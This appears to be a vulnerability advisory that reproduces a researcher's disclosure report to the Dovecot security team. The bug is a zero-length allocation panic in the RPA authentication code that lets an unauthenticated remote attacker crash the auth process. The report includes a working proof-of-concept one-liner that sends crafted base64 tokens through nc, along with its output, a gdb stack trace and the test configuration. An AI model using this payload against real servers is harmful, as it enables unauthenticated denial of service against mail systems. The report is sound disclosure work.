7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P
Hi, Dovecot security team.
I am Orange from DEVCORE security team. We just did a little security audit on the authentication mechanism of Dovecot, and found a buffer over-read in RPA implementation.
In the mech-rpa.c
, the function rpa_read_buffer doesn’t check that the length could be zero, and pass the zero into p_malloc(...)
. It reaches the i_panic
due to the safety check, and raises the SIGABRT
to exit whole the dovecot/auth
process.
PoC:
$ ps -ao pid,cmd | grep dovecot/auth
25312 dovecot/auth
$ (echo 'AUTH RPA'; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x01\x00\x04\x00\x00\x01' | base64 -w 0; echo ; echo -ne '\x60\x11\x06\x09\x60\x86\x48\x01\x86\xf8\x73\x01\x01\x00\x03A@A\x00' | base64 -w 0; echo ; echo QUIT) | nc 127.0.0.1 110
+OK Dovecot ready.
+
+ YEkGCWCGSAGG+HMBAQMAIGQRQj/rSuEgBcOqNgYJRgZIbKOIvMFtVmW+dFdYtrc1YWZjNTcxYWQ1ZTNlMTcAC3BvcDNAdWJ1bnR1
-ERR [AUTH] Authentication failed.
+OK Logging out
$ ps -ao pid,cmd | grep dovecot/auth
25467 dovecot/auth
Stack traces:
Legend: code, data, rodata, value
Stopped reason: SIGABRT
0xf7fc8079 in __kernel_vsyscall ()
gdb-peda$ bt
#0 0xf7fc8079 in __kernel_vsyscall ()
#1 0xf7bcd832 in raise () from /lib/i386-linux-gnu/libc.so.6
#2 0xf7bcecc1 in abort () from /lib/i386-linux-gnu/libc.so.6
#3 0xf7eb7656 in default_fatal_finish (status=0x0, type=LOG_TYPE_PANIC) at failures.c:459
#4 fatal_handler_real (ctx=ctx@entry=0xffb550e4, format=format@entry=0x5666baf7 "Trying to allocate %u bytes",
args=args@entry=0xffb55114 "") at failures.c:471
#5 0xf7eb77b4 in i_internal_fatal_handler (ctx=0xffb550e4, format=0x5666baf7 "Trying to allocate %u bytes",
args=0xffb55114 "") at failures.c:848
#6 0xf7df6499 in i_panic (format=0x5666baf7 "Trying to allocate %u bytes") at failures.c:523
#7 0x5664e236 in p_malloc (size=<optimized out>, pool=<optimized out>) at ../../src/lib/mempool.h:105
#8 rpa_read_buffer (buffer=<optimized out>, end=<optimized out>, data=<optimized out>, pool=<optimized out>)
at mech-rpa.c:230
#9 rpa_parse_token3 (error=0xffb55140, data_size=<optimized out>, data=<optimized out>, request=<optimized out>)
at mech-rpa.c:283
#10 mech_rpa_auth_phase2 (data_size=<optimized out>, data=<optimized out>, auth_request=<optimized out>)
at mech-rpa.c:504
#11 mech_rpa_auth_continue (auth_request=<optimized out>, data=<optimized out>, data_size=<optimized out>)
at mech-rpa.c:543
#12 0x56641a91 in auth_request_handler_auth_continue (handler=<optimized out>, args=<optimized out>)
at auth-request-handler.c:696
#13 0x56632812 in auth_client_handle_line (line=0x5839b106 "CONT\t1\tYBEGCWCGSAGG+HMBAQADQUBBAA==",
conn=<optimized out>) at auth-client-connection.c:228
#14 auth_client_input (conn=<optimized out>) at auth-client-connection.c:311
#15 0xf7ed4ddb in io_loop_call_io (io=0x5839d640) at ioloop.c:713
#16 0xf7ed6e5e in io_loop_handler_run_internal (ioloop=0x583879f0) at ioloop-epoll.c:222
#17 0xf7ed4ed2 in io_loop_handler_run (ioloop=0x583879f0) at ioloop.c:765
#18 0xf7ed5139 in io_loop_run (ioloop=0x583879f0) at ioloop.c:738
#19 0xf7e2d0a5 in master_service_run (service=0x58387920, callback=0x566303b0 <client_connected>)
at master-service.c:809
#20 0x5662ff70 in main (argc=<optimized out>, argv=<optimized out>) at main.c:395
#21 0xf7bb8e81 in __libc_start_main () from /lib/i386-linux-gnu/libc.so.6
#22 0x566301a1 in _start ()
We have tested this bug on Dovecot-Core 2.3.10, and our configuration is:
# 2.3.10 (): dovecot.conf
# OS: Linux 4.15.0-96-generic x86_64 Ubuntu 18.04.1 LTS
# Hostname: ubuntu
auth_mechanisms = plain login rpa
default_internal_user = orange
default_login_user = orange
namespace inbox {
inbox = yes
location =
mailbox Drafts {
special_use = \Drafts
}
mailbox Junk {
special_use = \Junk
}
mailbox Sent {
special_use = \Sent
}
mailbox "Sent Messages" {
special_use = \Sent
}
mailbox Trash {
special_use = \Trash
}
prefix =
}
passdb {
driver = shadow
}
userdb {
driver = passwd
}
Denied-of-Service. Please note the crash is before the authentication process, it means an attacker can crash the REMOTE Dovecot server without passwords.
7.5 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
NONE
Integrity Impact
NONE
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:N/I:N/A:P